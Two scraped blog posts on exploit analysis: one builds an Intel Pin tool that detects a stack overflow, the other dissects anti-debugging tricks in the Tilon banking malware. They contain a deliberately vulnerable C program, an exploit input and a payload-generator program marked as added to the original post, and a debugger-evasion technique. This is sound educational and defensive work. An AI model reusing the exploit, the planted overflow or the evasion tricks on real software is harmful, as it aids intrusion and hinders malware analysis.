ADDRINT ExceptionDispatcher = 0;  // address of ntdll!KiUserExceptionDispatcher

/* ===================================================================== */
/* Instrumentation functions */
/* ===================================================================== */

// Called before every instruction with its address (more arguments are added later)
VOID DetectEip(ADDRINT AddrEip, ...)
{
    // User-mode exceptions are delivered through KiUserExceptionDispatcher,
    // so reaching its address means an exception has just occurred
    if(AddrEip == ExceptionDispatcher)
    {
        fprintf(OutTrace, "%08x Exception occurred!\n", AddrEip);
    }
    // Here you can call the functions that we will add
    // (you should also remove the next line to avoid tracing every instruction being executed)
    fprintf(OutTrace, "%08x \n", AddrEip);
}

// Pin calls this function every time a new instruction is encountered
VOID Instruction(INS Ins, VOID *v)
{
    // Insert a call to DetectEip before every instruction, and pass it the IP
    INS_InsertCall(Ins, IPOINT_BEFORE, (AFUNPTR)DetectEip, IARG_INST_PTR, IARG_END);
}

// Pin calls this function every time a module is loaded
VOID ImageLoad(IMG Img, VOID *v)
{
    fprintf(OutTrace, "Loading module %s \n", IMG_Name(Img).c_str());
    fprintf(OutTrace, "Module Base: %08x \n", IMG_LowAddress(Img));
    fprintf(OutTrace, "Module end: %08x \n", IMG_HighAddress(Img));
    fflush(OutTrace);
}

/* ===================================================================== */
/* Finalization function */
/* ===================================================================== */

// This function is called when the application exits
VOID Fini(INT32 code, VOID *v)
{
    fprintf(OutTrace, "Terminating execution\n");
    fflush(OutTrace);
    fclose(OutTrace);
}

/* ===================================================================== */
/* Print Help Message */
/* ===================================================================== */
INT32 Usage()
{
    PIN_ERROR("Init error\n");
    return -1;
}

/* ===================================================================== */
/* Main */
/* ===================================================================== */
int main(int argc, char * argv[])
{
    OutTrace = fopen("itrace.txt", "wb");

    // Resolve KiUserExceptionDispatcher in ntdll: without ASLR (Windows XP) it is
    // mapped at the same address in every process, so the value is valid in the target too
    WINDOWS::HMODULE hNtdll;
    hNtdll = WINDOWS::LoadLibrary("ntdll");
    ExceptionDispatcher = (ADDRINT)WINDOWS::GetProcAddress(hNtdll, "KiUserExceptionDispatcher");
    fprintf(OutTrace, "Exception handler address: %08x \n", ExceptionDispatcher);
    WINDOWS::FreeLibrary(hNtdll);

    // Initialize pin; stop here if the command line could not be parsed
    if (PIN_Init(argc, argv))
    {
        return Usage();
    }

    // Register Instruction to be called to instrument instructions
    INS_AddInstrumentFunction(Instruction, 0);
    // Register ImageLoad to be called at every module load
    IMG_AddInstrumentFunction(ImageLoad, 0);
    // Register Fini to be called when the application exits
    PIN_AddFiniFunction(Fini, 0);

    // Start the program, never returns
    fprintf(OutTrace, "Starting Pintool\n");
    PIN_StartProgram();
    return 0;
}
</code></pre>
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Verdana, sans-serif;">It basically logs to a file: the address of each instruction being executed; all the exceptions that occurred; the name of each module being loaded, including its base and end address.</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">I have also put a comment in the "DetectEip()" function, to specify where you can call the functions we will add later.</span><br />
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Verdana, sans-serif; font-size: large;"><u>First exploit scenario: stack overflow.</u></span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">As a first case study, we are going to consider a specially crafted sample:</span>
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<br />
<pre class="CICodeFormatter"><code class="CICodeFormatter"> #include <stdio.h>
#include <string.h>
/* FF E4 = "JMP ESP": lives in .data, which is executable once DEP is off */
unsigned char Var[2] = {0xFF, 0xE4};
void GetPassword(){
char Password[12];
memset(Password, 0, sizeof(Password));
printf("Insert your password (max 12 chars):\n");
int i = -1;
/* deliberately unbounded: keeps reading until CR or LF, so anything
longer than 12 bytes runs over the rest of the stack frame */
do{
i++;
Password[i] = getchar();
} while (Password[i] != 0x0D && Password[i] != 0x0A);
Password[i] = 0;
printf("Your password is: %s \n", Password);
}
int main(void){
GetPassword();
return 0;
}
</code></pre>
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">Before compiling and linking it (I used Visual Studio 10), be sure to disable all the security options, i.e. stack canaries, DEP and ASLR (/GS-, /NXCOMPAT:NO, /DYNAMICBASE:NO), and to set the base address to 0x41410000 (/BASE:0x41410000).</span><br />
<span style="font-family: Verdana, sans-serif;">I know it might sound a little unreal, and in fact... it is! But don't worry: as I said before, this is just the simplest example that crossed my mind and we are going to use it as a first test. The methodology I'm proposing is very effective anyway, and we will see a real case study later.</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span><span style="font-family: Verdana, sans-serif;">First, we need to "exploit" this little test: I'll be quick. Open the executable in OllyDbg and run it up to the "getchar" call that reads the input, then type the following (it worked on my build; check the parameters explained below if you want to be 100% sure): "</span><span style="font-family: 'Courier New', Courier, monospace;">123456789abcAAAA 0AABBBBBBBBBBBBBBBBBBB</span><span style="font-family: Verdana, sans-serif;">" (without the quotes).</span><br />
<br />
<span style="font-family: Verdana, sans-serif;">What's the meaning of it? We fill the 12 bytes the buffer holds and, since the input length is never checked, we keep typing:</span><br />
<br />
<ul>
<li><span style="font-family: Verdana, sans-serif;">"AAAA", the four bytes that sit between the end of the buffer and the saved return address (compiler padding and/or the saved EBP, depending on the frame layout);</span></li>
<li><span style="font-family: Verdana, sans-serif;">" 0AA", which is the address 0x41413020 written in little-endian byte order (0x20 0x30 0x41 0x41, i.e. "AA0 " read backwards), where the two bytes of "Var" (0xFF 0xE4 = "JMP ESP") are located: this overwrites the return address saved when "main" called "GetPassword", so the RET lands on our JMP ESP;</span></li>
<li><span style="font-family: Verdana, sans-serif;">a run of "B" (0x42, which decodes as "INC EDX"): this is where the shellcode normally goes, but for a test any valid instruction will do. JMP ESP lands right here, because after the RET has popped the return address ESP points at the bytes that follow it.</span></li>
</ul>
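<span style="font-family: Verdana, sans-serif;">The same input, generated instead of typed: an added example, not code from the original post. It packs the return address little-endian, which is what the " 0AA" sequence does by hand, and refuses any payload containing 0x0A or 0x0D, because the sample's read loop stops at the first of them. The first 12 bytes are 'A' instead of "123456789abc"; that choice, the 20-byte INC EDX filler, the file name and the build line are assumptions of the example.</span><br />

```c
/* mkpayload.c: builds the input for StackBof.exe described above and writes it
 * to stdout (added example, not part of the original post).  Layout and the
 * 0x41413020 address come from the post; the bad-byte rule comes from the
 * sample's read loop, which stops at the first CR or LF.
 * Build: cc -std=c99 -o mkpayload mkpayload.c && ./mkpayload > input.txt */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define BUF_SIZE   12      /* char Password[12] */
#define FILLER      4      /* the "AAAA" between the buffer and the return address */
#define RET_OFFSET (BUF_SIZE + FILLER)

/* Little-endian encoding of a 32-bit address: the " 0AA" trick, generalised. */
static void put_le32(uint8_t *dst, uint32_t v)
{
    for (int i = 0; i < 4; i++)
        dst[i] = (uint8_t)(v >> (8 * i));
}

/* Bytes the victim's getchar() loop treats as end of input. */
static int is_bad_byte(uint8_t b)
{
    return b == 0x0A || b == 0x0D;
}

/* Assembles filler + return address + code into out (capacity cap).
 * Returns the total length, or -1 if it does not fit or contains a byte that
 * would end the read before the return address and code are in place. */
int build_payload(uint8_t *out, size_t cap, uint32_t ret_addr,
                  const uint8_t *code, size_t code_len)
{
    size_t total = RET_OFFSET + 4 + code_len;
    if (total > cap)
        return -1;
    memset(out, 'A', RET_OFFSET);                 /* fill buffer + filler */
    put_le32(out + RET_OFFSET, ret_addr);         /* saved EIP -> JMP ESP */
    memcpy(out + RET_OFFSET + 4, code, code_len); /* what JMP ESP lands on */
    for (size_t i = 0; i < total; i++)
        if (is_bad_byte(out[i]))
            return -1;
    return (int)total;
}

/* Constructed demo: 20 x INC EDX (0x42) stands in for real shellcode.  The
 * result is left in g_payload so it can be inspected after the call. */
uint8_t g_payload[64];

int build_demo(uint32_t ret_addr)
{
    uint8_t code[20];
    memset(code, 0x42, sizeof code);
    return build_payload(g_payload, sizeof g_payload, ret_addr, code, sizeof code);
}

int main(void)
{
    int n = build_demo(0x41413020u);
    if (n < 0) {
        fputs("payload contains a bad byte or is too long\n", stderr);
        return 1;
    }
    fwrite(g_payload, 1, (size_t)n, stdout);
    fputc('\n', stdout);   /* the LF that terminates the victim's read loop */
    return 0;
}
```

<span style="font-family: Verdana, sans-serif;">Feed the output to the sample with input redirection rather than pasting it: the bad-byte check matters as soon as the JMP ESP address or the shellcode happens to contain a CR or LF, which is exactly the case the hand-typed string never hits.</span><br />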
<br />
<span style="font-family: Verdana, sans-serif;">Now that you have verified that my string works on your build too, or you have built your own, we are ready to analyze the first exploit scenario:</span><span style="font-family: Verdana, sans-serif;"> a simple stack overflow. How can we detect it?</span><br />
<span style="font-family: Verdana, sans-serif;">The most natural idea is to check EIP at every instruction and see whether it points outside every executable image, into a region that should only hold data (the stack, in this case).</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">The Pintool keeps two variables holding the base and end address of the module currently being executed.</span><br />
<span style="font-family: Verdana, sans-serif;">If EIP falls outside that range, the Pintool walks the image list maintained by Pin looking for another loaded module that contains EIP (after an API call, for instance). </span><span style="font-family: Verdana, sans-serif;">When one is found, the two variables are updated so that it becomes the current module.</span><br />
<span style="font-family: Verdana, sans-serif;">If EIP is not inside any loaded module, the Pintool reports it as suspicious, dumps the last 1000 EIPs it executed and stops the process.</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">Here is the code to do that:</span><br />
<style type="text/css">
pre.CICodeFormatter{
font-family:arial;
font-size:12px;
border:1px dashed #CCCCCC;
width:99%;
height:auto;
overflow:auto;
background:#f0f0f0;
line-height:20px;
background-image:URL(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0RLiAlfLucI_qoHJvHaLwvgXby8Z5TK-aqUneDA06kscMW-ILm4a94iJq4qsFWJQEUtkkWWtnA6woWdwoPT2LE4DB2URdsSOOa3-smdrFFQB1oG2jam0NLQaJYk7Z95MyTJNdoHSDytEn/s320/codebg.gif);
padding:0px;
color:#000000;
text-align:left;
}
pre.CICodeFormatter code{
color:#000000;
word-wrap:normal;
}
</style>
<br />
<pre class="CICodeFormatter"><code class="CICodeFormatter"> #define LAST_EXECUTED 1000
ADDRINT LastExecutedBuf[LAST_EXECUTED];      // circular history of executed EIPs
UINT32 LastExecutedPos = 0;                  // next free slot in the ring
ADDRINT CurrentModuleBase = 0, CurrentModuleEnd = 0;

// Scan the images known to Pin for the one containing Addr and cache its range.
bool IsModuleFound(ADDRINT Addr)
{
    for(IMG Img = APP_ImgHead(); IMG_Valid(Img); Img = IMG_Next(Img))
    {
        if(Addr >= IMG_LowAddress(Img) &&
           Addr <= IMG_HighAddress(Img)) // IMG_HighAddress is the last byte: <=, not <
        {
            CurrentModuleBase = IMG_LowAddress(Img);
            CurrentModuleEnd = IMG_HighAddress(Img);
            return true;
        }
    }
    return false;
}

// Called for every instruction: EIP must fall inside some loaded image.
void CheckEipModule(ADDRINT AddrEip)
{
    UINT32 i;
    // same inclusive upper bound as in IsModuleFound
    if(! (AddrEip >= CurrentModuleBase && AddrEip <= CurrentModuleEnd) )
    {
        if(!IsModuleFound(AddrEip))
        {
            // eip is not within an executable image!
            fprintf(OutTrace, "EIP detected not within an executable module: %08x \n", AddrEip);
            fprintf(OutTrace,"Dumping list of previously executed EIPs \n");
            // dump the ring oldest-first; slots never written (still 0) are skipped
            for(i = LastExecutedPos; i < LAST_EXECUTED; i++)
            {
                if(LastExecutedBuf[i]) fprintf(OutTrace, "%08x \n", LastExecutedBuf[i]);
            }
            for(i = 0; i < LastExecutedPos; i++)
            {
                fprintf(OutTrace, "%08x \n", LastExecutedBuf[i]);
            }
            fprintf(OutTrace, "%08x \n --- END ---", AddrEip);
            fflush(OutTrace);
            WINDOWS::ExitProcess(0);
        }
    }
    LastExecutedBuf[LastExecutedPos] = AddrEip;
    LastExecutedPos++;
    if(LastExecutedPos >= LAST_EXECUTED)
    {
        // circular logging
        LastExecutedPos = 0;
    }
}
</code></pre>
<br />
<span style="font-family: Verdana, sans-serif;">You can simply copy it in the provided basic Pintool, but remember to also add the line:</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;">CheckEipModule(AddrEip);</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">in the "DetectEip()" function (where specified by the comment).</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">Compile/link the Pintool and execute it.</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">Once executed, it will generate a log (I've cut some lines!) like the following:</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;">Exception handler address: 7c91eaec </span><br />
<span style="font-family: Courier New, Courier, monospace;">Starting Pintool</span><br />
<span style="font-family: Courier New, Courier, monospace;">Loading module C:\...\StackBof.exe </span><br />
<span style="font-family: Courier New, Courier, monospace;">Module Base: 41410000 </span><br />
<span style="font-family: Courier New, Courier, monospace;">Module end: 41414fff </span><br />
<span style="font-family: Courier New, Courier, monospace;">Loading module C:\WINDOWS\system32\kernel32.dll </span><br />
<span style="font-family: Courier New, Courier, monospace;">Module Base: 7c800000 </span><br />
<span style="font-family: Courier New, Courier, monospace;">Module end: 7c8fefff </span><br />
<span style="font-family: Courier New, Courier, monospace;">Loading module C:\WINDOWS\system32\ntdll.dll </span><br />
<span style="font-family: Courier New, Courier, monospace;">Module Base: 7c910000 </span><br />
<span style="font-family: Courier New, Courier, monospace;">Module end: 7c9c5fff </span><br />
<span style="font-family: Courier New, Courier, monospace;">Loading module C:\WINDOWS\system32\MSVCR100.dll </span><br />
<span style="font-family: Courier New, Courier, monospace;">Module Base: 78aa0000 </span><br />
<span style="font-family: Courier New, Courier, monospace;">Module end: 78b5dfff </span><br />
<span style="font-family: Courier New, Courier, monospace;">EIP detected not within an executable module: 0012ff84 </span><br />
<span style="font-family: Courier New, Courier, monospace;">Dumping list of previously executed EIPs </span><br />
<span style="font-family: Courier New, Courier, monospace;">78ac005f </span><br />
<span style="font-family: Courier New, Courier, monospace;">78ac0061 </span><br />
<span style="font-family: Courier New, Courier, monospace;">78ac0062 </span><br />
<span style="font-family: Courier New, Courier, monospace;">78ac0063 </span><br />
<span style="font-family: Courier New, Courier, monospace;">78ac0069 </span><br />
<div>
<span style="font-family: Courier New, Courier, monospace;">...</span></div>
<div>
<div>
<span style="font-family: Courier New, Courier, monospace;">78ab0cd7 </span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">78ab0cd8 </span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">78b05747 </span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">4141104f </span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">41411052 </span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">41411053 </span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">41411054 </span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">41411056 </span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">41411057 </span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">41411059 </span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">4141105a </span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">41413020 </span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">0012ff84 </span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> --- END ---</span></div>
</div>
<div>
<div style="font-family: Verdana, sans-serif;">
<br /></div>
<div style="font-family: Verdana, sans-serif;">
It's very simple to understand what happened just by reading the log:</div>
<br />
<ul>
<li><span style="font-family: Verdana, sans-serif;">the RET instruction of "GetPassword" is located at 0x4141105A;</span></li>
<li><span style="font-family: Verdana, sans-serif;">it returns to the overwritten return address 0x41413020, where our "JMP ESP" bytes are;</span></li>
<li><span style="font-family: Verdana, sans-serif;">the Pintool detects that execution has left every executable module: the next EIP is 0x0012FF84, an address on the stack.</span></li>
</ul>
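<span style="font-family: Verdana, sans-serif;">To exercise the detection logic outside Pin, here is a stand-alone C model of CheckEipModule (an added example, not the Pintool itself) fed with the module table and the EIP sequence taken from the log above. It keeps the same cached current-module range and the same inclusive upper bound, but dumps only the history slots that were actually written; the 8-entry ring and the trace are constructed for the demo.</span><br />

```c
/* eip_monitor.c: stand-alone model of the CheckEipModule logic from the post,
 * driven by a constructed trace instead of Pin callbacks (added example, not
 * the original Pintool).  Build: cc -std=c99 -o eip_monitor eip_monitor.c */
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

typedef uint32_t ADDRINT;               /* 32-bit target, as in the post */
#define LAST_EXECUTED 8                 /* small ring so the wrap-around shows */

/* Constructed module list, copied from the log above (base / last byte). */
struct module { const char *name; ADDRINT low, high; };
static const struct module g_modules[] = {
    { "StackBof.exe", 0x41410000u, 0x41414fffu },
    { "kernel32.dll", 0x7c800000u, 0x7c8fefffu },
    { "ntdll.dll",    0x7c910000u, 0x7c9c5fffu },
    { "MSVCR100.dll", 0x78aa0000u, 0x78b5dfffu },
};
#define N_MODULES (sizeof g_modules / sizeof g_modules[0])

struct monitor {
    bool have_current;                  /* is cur_* valid yet? */
    ADDRINT cur_base, cur_end;          /* cached range of the current module */
    ADDRINT ring[LAST_EXECUTED];        /* circular history of good EIPs */
    unsigned pos, filled;               /* next slot / number of valid slots */
};

/* Linear scan of the module list; the upper bound is inclusive, as in the post. */
const struct module *lookup_module(ADDRINT eip)
{
    for (size_t i = 0; i < N_MODULES; i++)
        if (eip >= g_modules[i].low && eip <= g_modules[i].high)
            return &g_modules[i];
    return NULL;
}

/* Equivalent of CheckEipModule: true if eip is backed by a module (and then
 * recorded), false on a rogue eip, leaving the ring intact for the dump. */
bool check_eip(struct monitor *m, ADDRINT eip)
{
    if (!(m->have_current && eip >= m->cur_base && eip <= m->cur_end)) {
        const struct module *mod = lookup_module(eip);
        if (!mod)
            return false;
        m->have_current = true;         /* cache the new current module */
        m->cur_base = mod->low;
        m->cur_end = mod->high;
    }
    m->ring[m->pos] = eip;
    m->pos = (m->pos + 1) % LAST_EXECUTED;
    if (m->filled < LAST_EXECUTED)
        m->filled++;
    return true;
}

/* Copies the history into out[] oldest-first and returns the entry count;
 * slots never written are skipped instead of being dumped as 00000000. */
unsigned dump_history(const struct monitor *m, ADDRINT *out)
{
    unsigned start = (m->pos + LAST_EXECUTED - m->filled) % LAST_EXECUTED;
    for (unsigned i = 0; i < m->filled; i++)
        out[i] = m->ring[(start + i) % LAST_EXECUTED];
    return m->filled;
}

/* Feeds a trace; returns the index of the first rogue eip, or -1 if clean. */
int scan_trace(struct monitor *m, const ADDRINT *trace, size_t n)
{
    for (size_t i = 0; i < n; i++)
        if (!check_eip(m, trace[i]))
            return (int)i;
    return -1;
}

/* Constructed trace: the tail of the log above, ending on the stack address
 * that JMP ESP lands on.  Results are left in globals for inspection. */
static const ADDRINT g_trace[] = {
    0x78ab0cd7u, 0x78ab0cd8u, 0x78b05747u, 0x4141104fu, 0x41411052u,
    0x41411053u, 0x41411054u, 0x41411056u, 0x41411057u, 0x41411059u,
    0x4141105au, 0x41413020u, 0x0012ff84u,
};
ADDRINT g_hist[LAST_EXECUTED];
unsigned g_nhist;

int run_demo(void)
{
    struct monitor m = {0};
    int bad = scan_trace(&m, g_trace, sizeof g_trace / sizeof g_trace[0]);
    g_nhist = dump_history(&m, g_hist);
    return bad;
}

int main(void)
{
    int bad = run_demo();
    if (bad < 0) { puts("trace clean"); return 0; }
    printf("EIP detected not within an executable module: %08x\n", g_trace[bad]);
    puts("Dumping list of previously executed EIPs");
    for (unsigned i = 0; i < g_nhist; i++)
        printf("%08x\n", g_hist[i]);
    return 1;
}
```

<span style="font-family: Verdana, sans-serif;">With a ring of 8 the dump holds the last eight good EIPs, from the body of "main" up to the JMP ESP at 0x41413020, in the same order as the Pintool's log; the lookup for 0x0012FF84 fails because no image covers the stack, which is the whole point of the check.</span><br />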
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Verdana, sans-serif; font-size: large;"><u>Conclusions</u></span></div>
<div>
<span style="font-family: Verdana, sans-serif;"><u><br /></u></span></div>
<div>
<span style="font-family: Verdana, sans-serif;">This was an introductory article on binary instrumentation for exploit analysis and I really hope you liked it! See you in a few days for the second part, where I will discuss another scenario: a real pdf exploit that uses ROP and heap spraying.</span></div>
<span style="font-family: Verdana, sans-serif;">Posted by giulia (http://www.blogger.com/profile/12995367052667481710) on 2012-10-25</span><br />
<span style="font-family: Verdana, sans-serif; font-size: large;"><u>Tricky Tilon: disappearing instruction, anti-debugging, deceptions and much more!</u></span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif; font-size: large;"><u>Introduction</u></span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">This post is about a sort of anti-debugging trick that I discovered while analyzing a malware named <i>Tilon</i>. To be precise, it's more a deception trick than an anti-debugging one but, as we will see, it's easy to tweak it into something that really tampers with debugging.</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">Tilon is a banker that <a href="http://www.trusteer.com/blog/tilon-son-of-silon">has been spotted by Trusteer</a> in July 2012 and, aside from some pretty standard stuff, like a <i>Man In The Browser</i> implementation, it is best known for the number of evasion techniques it uses. While digging deeper into its various encryption/packer layers I found one that hasn't been reported yet.</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">All the layers are very easy to bypass: they roughly consist of basic crypto operations and UPX compression</span><span style="font-family: Verdana, sans-serif;">. After peeling them off you reach the following listing:</span><br />
<br />
<span style="background-color: white; font-family: Courier New, Courier, monospace;">...</span><br />
<span style="background-color: white;"><br /></span>
<span style="background-color: white; font-family: Courier New, Courier, monospace;">008D0079 CALL 008D0233</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace;">008D007E CALL 008D04DC</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace;">008D0083 POPAD</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace;">008D0084 ADD ESP,4</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace;">008D0087 MOV EAX,DWORD PTR SS:[EBP+4020BF]</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace;">008D008D JMP EAX</span><br />
<span style="background-color: white; font-family: Courier New, Courier, monospace;"><br /></span>
<span style="background-color: white; font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Verdana, sans-serif; font-size: large;"><u>Tilon's trick(s)</u></span><br />
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Verdana, sans-serif;">So, we have two CALLs and one JMP.</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">If we step into the first call, we notice that the malware sets a "hook" (not API hooking in the usual sense, since it only affects the process itself) on <i>KiUserExceptionDispatcher</i> (the <i>NTDLL.dll</i> function the kernel transfers control to whenever an exception has to be dispatched in user mode) so that it calls what we will discover to be a decryption routine.</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhqQXb8FaAtbUe6ywtFQSCEWvQP5uzZ6dQ1iBDFYH43-6v9BRQzeagnD-h4ufgwVzrRo_kqeQNLd5z6qKUpQVGlMasdSnExJqyhsvKFte1wa5snUPHBluvgSY-kbdnIP7wq4A49kgAZY2s/s1600/hook.bmp" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhqQXb8FaAtbUe6ywtFQSCEWvQP5uzZ6dQ1iBDFYH43-6v9BRQzeagnD-h4ufgwVzrRo_kqeQNLd5z6qKUpQVGlMasdSnExJqyhsvKFte1wa5snUPHBluvgSY-kbdnIP7wq4A49kgAZY2s/s1600/hook.bmp" /></a></div>
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">Pay attention to the code while stepping... As I mentioned before, Tilon is known for the number of deception tricks it implements!</span><br />
<span style="font-family: Verdana, sans-serif;">For example, the next call uses a well known <a href="http://www.symantec.com/connect/articles/windows-anti-debug-reference"><i>PEB</i>-based anti-debugging trick</a>: it walks from the TEB (FS:[18]) to the PEB (TEB+30) and reads the <i>BeingDebugged</i> byte at PEB+2:</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;">008D04DC MOV EAX,DWORD PTR FS:[18] <span style="color: #38761d;">; TEB</span></span><br />
<span style="font-family: Courier New, Courier, monospace;">008D04E2 MOV EAX,DWORD PTR DS:[EAX+30] <span style="color: #38761d;">; PEB</span></span><br />
<span style="font-family: Courier New, Courier, monospace;">008D04E5 MOVZX EAX,BYTE PTR DS:[EAX+2] <span style="color: #38761d;">; BeingDebugged</span></span><br />
<span style="font-family: Courier New, Courier, monospace;">008D04E9 TEST EAX,EAX</span><br />
<span style="font-family: Courier New, Courier, monospace;">008D04EB JNZ SHORT 008D04EE <span style="color: #38761d;">; non-zero: a debugger is attached</span></span><br />
<span style="font-family: Courier New, Courier, monospace;">008D04ED RETN</span><br />
<span style="font-family: Courier New, Courier, monospace;">008D04EE INT3</span><br />
<span style="font-family: Courier New, Courier, monospace;">...</span><br />
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Verdana, sans-serif;">Finally, there is a jump that lands on encrypted code:</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjC4ho4CIkkF1MibALY-rey3OTEV1yqZH9u1hSmrhBYqenpjI6xicXAtDCCrXgZcKbvvz-ZGjVs1w6YvfGyJzn7BimtaiDute3mFlPeGfK42o5_0OSigP8qTaXH8yA12hQWoJCv0NILJdE/s1600/encryptedbytes.bmp" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjC4ho4CIkkF1MibALY-rey3OTEV1yqZH9u1hSmrhBYqenpjI6xicXAtDCCrXgZcKbvvz-ZGjVs1w6YvfGyJzn7BimtaiDute3mFlPeGfK42o5_0OSigP8qTaXH8yA12hQWoJCv0NILJdE/s1600/encryptedbytes.bmp" /></a></div>
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">Access violation, indeed!</span><br />
<span style="font-family: Verdana, sans-serif;">Since no <i>Exception Handler</i> is registered, one might conclude that the code simply crashed for some reason they missed, and restart the debugger to carry out a more careful analysis. If instead we pass the exception to the program (<i>Shift+F8</i> in OllyDbg), the "hook" installed earlier runs and decrypts the code; it then removes itself from <i>KiUserExceptionDispatcher</i> and jumps to the decrypted bytes.</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">So this is not really an anti-debugging trick, even though it will work fine in some cases, like against emulators. But let's stay focused: our goal is to fool the debugger. How can we do it? There are surely several ways; the one I have in mind mixes this trick, the <i>PEB</i> one and... one more finding!</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<br />
<span style="font-family: Verdana, sans-serif;">Let me explain it briefly: when Tilon raises the exception and we press <i>Shift+F8</i>, the debugger executes the first instruction of the "hook" but breaks only on the second one.</span><br />
<span style="font-family: Verdana, sans-serif;">So we see: </span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;">7C91EAEC 68 FA028D00 PUSH 8D02FA <span style="color: #38761d;">; the first instruction is executed...</span></span><br />
<span style="font-family: Courier New, Courier, monospace;">7C91EAF1 C3 RETN <span style="color: #38761d;">; but the debugger will break only here!</span></span><br />
<br />
<br />
<span style="font-family: Verdana, sans-serif;">That gives us the possibility of hiding an instruction!</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">Putting the pieces together:</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgYPeKBBga4XgvbF8siczntpRy6aHuhRtyx2MBZMRvNKEiSaYbFwEggqx0i2LCLkcPwq0l1DZjZGCSGypHOoEuDiXXg-q5QjBwD-s_UdngNa7NJQIfOUhniO9HUb9k2Skg4XLxDgyyicQo/s1600/schema5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="232" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgYPeKBBga4XgvbF8siczntpRy6aHuhRtyx2MBZMRvNKEiSaYbFwEggqx0i2LCLkcPwq0l1DZjZGCSGypHOoEuDiXXg-q5QjBwD-s_UdngNa7NJQIfOUhniO9HUb9k2Skg4XLxDgyyicQo/s640/schema5.png" width="640" /></a></div>
<span style="font-family: Verdana, sans-serif;"><br /></span>
<br />
